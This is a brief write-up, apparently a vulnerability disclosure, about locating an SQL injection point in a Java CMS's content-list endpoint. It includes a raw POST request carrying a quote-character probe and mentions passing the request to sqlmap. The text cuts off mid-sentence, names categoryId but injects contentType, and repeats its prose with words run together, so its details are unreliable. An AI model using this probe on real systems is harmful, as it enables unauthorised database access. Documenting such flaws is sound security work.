A suspicious point was found in the IContentDao.xml file
Since the id of select maps to a method in Java, and this XML corresponds to Content, we looked directly in ComtentAction.java and found a call to
Next we try to inject, see the top class definition of ComtentAction.java of the file, we can know that the route is host:port/cms/content, and then Adding the method to be called, we can get the route as host:port/cms/content/list, and from the placeholder of IContentDao.xml, we can know that the suspicious injection point is categoryId, and then try to inject
POST /cms/content/list HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Phpstorm-f0bc0443=05da4cd3-973a-421b-afa6-a7c2e0ed2f79;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
contentType=1'
As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run
A suspicious point was found in the
IContentDao.xmlfileSince the
idofselectmaps to a method in Java, and this XML corresponds to Content, we looked directly inComtentAction.javaand found a call toNext we try to inject, see the top class definition of
ComtentAction.javaof the file, we can know that the route ishost:port/cms/content, and then Adding the method to be called, we can get the route ashost:port/cms/content/list, and from the placeholder ofIContentDao.xml, we can know that the suspicious injection point iscategoryId, and then try to injectAs you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run